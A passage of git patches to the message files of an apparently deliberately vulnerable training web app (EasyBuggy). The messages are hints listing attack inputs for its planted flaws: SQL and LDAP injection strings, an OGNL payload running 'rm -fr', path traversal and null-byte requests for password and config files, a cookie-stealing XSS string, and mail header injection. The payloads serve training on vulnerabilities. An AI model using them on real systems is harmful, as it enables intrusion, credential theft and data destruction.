-msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From 030d71c2d8e10492409da6b95e704e0ed6a1649e Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:43 +0900 Subject: [PATCH 016/139] New translations messages.properties (English) --- src/main/resources/messages_en.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_en.properties b/src/main/resources/messages_en.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_en.properties +++ b/src/main/resources/messages_en.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From e96c0b063d68e5be6f6af66df59b00e802dcda67 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:45 +0900 Subject: [PATCH 017/139] New translations messages.properties (French) --- src/main/resources/messages_fr.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_fr.properties b/src/main/resources/messages_fr.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_fr.properties +++ b/src/main/resources/messages_fr.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 or 9. +msg.note.lossoftrailingdigits=Loss of trailing digits occurs if you enter 0.0000000000000001. +msg.note.commandinjection=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. msg.note.not.use.ext.db=Database connection leak occurs if using an external RDBMS such as MySQL. Please edit application.properties if using an external RDBMS. msg.note.path.traversal=Change the query string to template\=../uid/adminpassword.txt?, then you can see the content of adminpassword.txt in this page. -msg.note.positive.number=Integer overflow occurs if you enter a number greater than or equal to 63. +msg.note.intoverflow=Integer overflow occurs if you enter a number greater than or equal to 63. msg.note.session.fixation=You can login with admin and password. \nThe URL rewriting feature works on this page in order to support clients that cannot use cookie, so the session fixation attack is possible. -msg.note.slow.regular.expression=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. -msg.note.slow.string.plus.operation=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. -msg.note.sql.deadlock=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. -msg.note.sql.injection=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 +msg.note.slowregex=If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, parse processing will take several tens of seconds
\n If you enter string to aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u3042, then no response will be received. +msg.note.strplusopr=If you enter a large number then the processing will take several tens of seconds because the string is created by "+" (plus) operator. +msg.note.deadlock2=If you open two windows (or tabs) and sort in the ascending order of user ID and click the "update" button on one window immediately after you \nsort in the descending order and click the "update" button on the other, then deadlock occurs in database. +msg.note.sqlijc=You can see a secret number if you enter Mark and password. \nYou can see other users information if you enter password to ' OR '1'\='1 msg.note.ldap.injection=You can login with admin and password. \nYou can bypass authentication and login with *)(|(objectClass\=* and password to aaaaaaa). -msg.note.mail.header.injection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. +msg.note.mailheaderinjection=If you change the input tag of the subject field to a textarea tag by browser's developer mode and set it to [subject][line break]Bcc\: [a mail address], then you can send a mail to the address. msg.note.mojibake=Mojibake occurs if you enter a multi-byte string. -msg.note.null.byte.injection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. +msg.note.nullbyteinjection=If using Java earlier than version 1.7.0_40 and you add fileName\=../WEB-INF/web.xml%00 to the query string, you can download a file which includes the content of web.xml. msg.note.open.redirect=You can login with admin and password. \nIf you add goto\=[an URL of a malicious site] to the query string, you can redirect to the malicious site. -msg.note.socket.leak.occur=Network socket leak occurs every time you load this page. -msg.note.unrestricted.ext.upload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. -msg.note.unintended.file.disclosure=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. -msg.note.unrestricted.size.upload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. +msg.note.netsocketleak=Network socket leak occurs every time you load this page. +msg.note.unrestrictedextupload=If you upload JSP file (named exit.jsp) including <% System.exit(0); %> and access to http\://localhost\:8080/uploadFiles/exit.jsp, \nthen JavaVM is forcibly finished. +msg.note.clientinfo=If the directory listing feature works and you access to http\://localhost\:8080/uid/, then you can see the file list in the uid directory. \nIf you login as an acount written in http\://localhost\:8080/uid/adminpassword.txt you can access to /uid/serverinfo.jsp. +msg.note.unrestrictedsizeupload=This page is vulnerable for attacks such as DoS because there are no limitation for uploading file size. msg.note.verbose.errror.message=You can login with admin and password. \nIt is easy to guess an account who can logs in since authentication error messages on this page is too detailed. msg.note.xee=If you upload the following XML file, it will waste server resources. msg.note.xss=Session ID is shown if you enter name to >tpircs/<;)eikooc.tnemucod(trela>tpIrcs< @@ -295,16 +295,16 @@ msg.update.records=Updated {0} records. msg.update.users.by.xml=If you upload an XML file of the following format, users can be updated all at once. msg.update.users=You can update users information. msg.select.upload.file=Select a file to upload. -msg.thread.leak.occur=Thread leak occurs every time you load this page. +msg.note.threadleak=Thread leak occurs every time you load this page. msg.user.not.exist=The user does not exist. msg.user.already.exist=The user already exists. msg.valid.json=Valid JSON\! msg.warn.enter.name.and.passwd=Please enter your name and password. -section.change.mail=Change Your Mail -section.change.password=Change Your Password -section.client.info=Client Information +title.clickjacking.page=Change Your Mail +title.csrf.page=Change Your Password +title.clientinfo.page=Client Information section.design.test=Design Test -section.server.info=Server Information +title.serverinfo.page=Server Information style.name.bootstrap=Bootstrap style.description.bootstrap=For more detail, please refer to the page\: http\://getbootstrap.com/ style.name.google.mdl=Google Material Design Lite @@ -319,36 +319,37 @@ style.name.monochro=Monochrome style.description.monochro=Monochrome header and footer are used. style.name.noframe=No Frame style.description.noframe=No header and footer are used. -title.access.history=Access History -title.admins.main.page=Main Page for Administrators +title.filedescriptorleak.page=Access History +title.adminmain.page=Main Page for Administrators title.current.date=Display Current Date -title.current.thread.count=Display Current Thread Count +title.threadleak.page=Display Current Thread Count title.current.time=Display Current Time -title.detect.deadlock=Detect Deadlock -title.endless.waiting.page=Execute Batch -title.guide.download=Download Guides -title.integer.overflow.page=The Distance from Earth to the Moon +title.deadlock.page=Detect Deadlock +title.endlesswaiting.page=Execute Batch +title.nullbyteinjection.page=Download Guides +title.index.page=EasyBuggy Boot +title.intoverflow.page=The Distance from Earth to the Moon title.login.page=Login Page for Administrators -title.loss.of.trailing.digits.page=Decimal Addition -title.mail.header.injection.page=Question to Administrator -title.heap.memory.usage=Heap Memory Usage -title.nonheap.memory.usage=Non-Heap Memory Usage +title.lossoftrailingdigits.page=Decimal Addition +title.mailheaderinjection.page=Question to Administrator +title.memoryleak.page=Heap Memory Usage +title.memoryleak2.page=Non-Heap Memory Usage title.mojibake.page=Capitalize String -title.ognl.expression.injection.page=Performing Basic Numeric Operations -title.parse.json=Parse JSON -title.response.time=Measure Response Time -title.random.string.generator=Random String Generator -title.round.off.error.page=Easy Subtraction -title.slow.regular.expression.page=Test Regular Expression -title.sql.injection.page=Search Your Secret Number -title.sum.of.natural.numbers=Sum of natural numbers -title.timezone=Display Time Zone Information -title.timezone.list=Lists of Time Zones -title.truncation.error.page=Decimal Division -title.unrestricted.extension.upload=Convert Gray Scale of Image File -title.unrestricted.size.upload=Reverse Color of Image File -title.user.list=User List +title.commandinjection.page=Performing Basic Numeric Operations +title.codeinjection.page=Parse JSON +title.netsocketleak.page=Measure Response Time +title.strplusopr.page=Random String Generator +title.roundofferror.page=Easy Subtraction +title.slowregex.page=Test Regular Expression +title.sqlijc.page=Search Your Secret Number +title.createobjects.page=Sum of natural numbers +title.memoryleak3.page=Display Time Zone Information +title.memoryleak3.page.list=Lists of Time Zones +title.truncationerror.page=Decimal Division +title.unrestrictedextupload.page=Convert Gray Scale of Image File +title.unrestrictedsizeupload.page=Reverse Color of Image File +title.dbconnectionleak.page=User List title.xss.page=Reverse String -title.xee=Batch Registration of Users -title.xxe=Batch Update of Users +title.xee.page=Batch Registration of Users +title.xxe.page=Batch Update of Users From 5aebd56eaa48a32557be88739f1849b19d0715d9 Mon Sep 17 00:00:00 2001 From: Kohei Tamura Date: Fri, 22 Sep 2017 14:30:46 +0900 Subject: [PATCH 018/139] New translations messages.properties (Chinese Simplified) --- src/main/resources/messages_zh.properties | 109 +++++++++++----------- 1 file changed, 55 insertions(+), 54 deletions(-) diff --git a/src/main/resources/messages_zh.properties b/src/main/resources/messages_zh.properties index 3c2fad4..c4aa227 100644 --- a/src/main/resources/messages_zh.properties +++ b/src/main/resources/messages_zh.properties @@ -205,7 +205,7 @@ msg.batch.registration.complete=Batch registration of users has completed. msg.batch.registration.fail=Batch registration of users fails. msg.batch.update.complete=Batch update of users has completed. msg.batch.update.fail=Batch update of users fails. -msg.c.heap.space.leak.occur=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak3=Memory leak occurs in C heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.calc.sym.natural.numbers=This page can calculate the sum of all natural numbers (1 + 2 + 3 + ... + n) less than or equal to n. msg.cant.create.batch=Can't create a batch file. msg.convert.grayscale=You can convert the color of an image file into gray scale. @@ -228,43 +228,43 @@ msg.enter.id.and.password=Please enter your user ID and password. msg.enter.string=Please enter a string. msg.error.user.not.exist=User does not exist or password does not match. msg.executed.batch=Created and executed the batch\: -msg.file.descriptor.leak.occur=File descriptor leak occurs every time you load this page. +msg.note.filedescriptorleak=File descriptor leak occurs every time you load this page. msg.info.jvm.not.crash=JVM crash only occurs if using Oracle JDK 6 or 7. msg.invalid.expression=Invalid expression \: {0} msg.invalid.json=Invalid JSON \: {0} -msg.java.heap.space.leak.occur=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. +msg.note.memoryleak=Memory leak occurs in Java heap space every time you load this page. \nIf keeping on loading this page, OutOfMemoryError is finally thrown. msg.low.alphnum8=Password is 8 lowercase alphanumeric characters. msg.need.admin.privilege=You need admin privileges to go ahead from here. msg.note.brute.force=You can login with admin and password. \nThe number of login attempts is not limited on this page, so the brute force attack is possible. msg.note.clickjacking=This page receives a request that a user does not intend and changes the user's mail address. -msg.note.code.injection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. +msg.note.codeinjection=If you enter {}');java.lang.System.exit(0);// , then JavaVM is forcibly finished due to code injection. msg.note.csrf=This page receives a request that a user does not intend and changes the user's password. msg.note.dangerous.file.inclusion=Change the query string to template\=[URL where malicious JSP file is deployed], then a malicious code is executed. msg.note.db.connection.leak.occur=DB connection leak occurs every time you load this page. -msg.note.dead.lock.occur=Deadlock occurs after continuously loading this page few times. -msg.note.enter.count=If you enter a large number, then an endless waiting process occurs. -msg.note.enter.large.number=If you enter a large number, it takes time to respond due to unnecessary object creation. -msg.note.enter.one=Round off error occurs if you enter 1. -msg.note.enter.specific.nembers=Truncation error occurs if you enter 3 or 7 or 9. -msg.note.enter.decimal.value=Loss of trailing digits occurs if you enter 0.0000000000000001. -msg.note.enter.runtime.exec=If you enter @Runtime@getRuntime().exec('rm -fr /your-important-dir/') , then your important directory is removed on your server. +msg.note.deadlock=Deadlock occurs after continuously loading this page few times. +msg.note.endlesswaiting=If you enter a large number, then an endless waiting process occurs. +msg.note.createobjects=If you enter a large number, it takes time to respond due to unnecessary object creation. +msg.note.roundofferror=Round off error occurs if you enter 1. +msg.note.truncationerror=Truncation error occurs if you enter 3 or 7 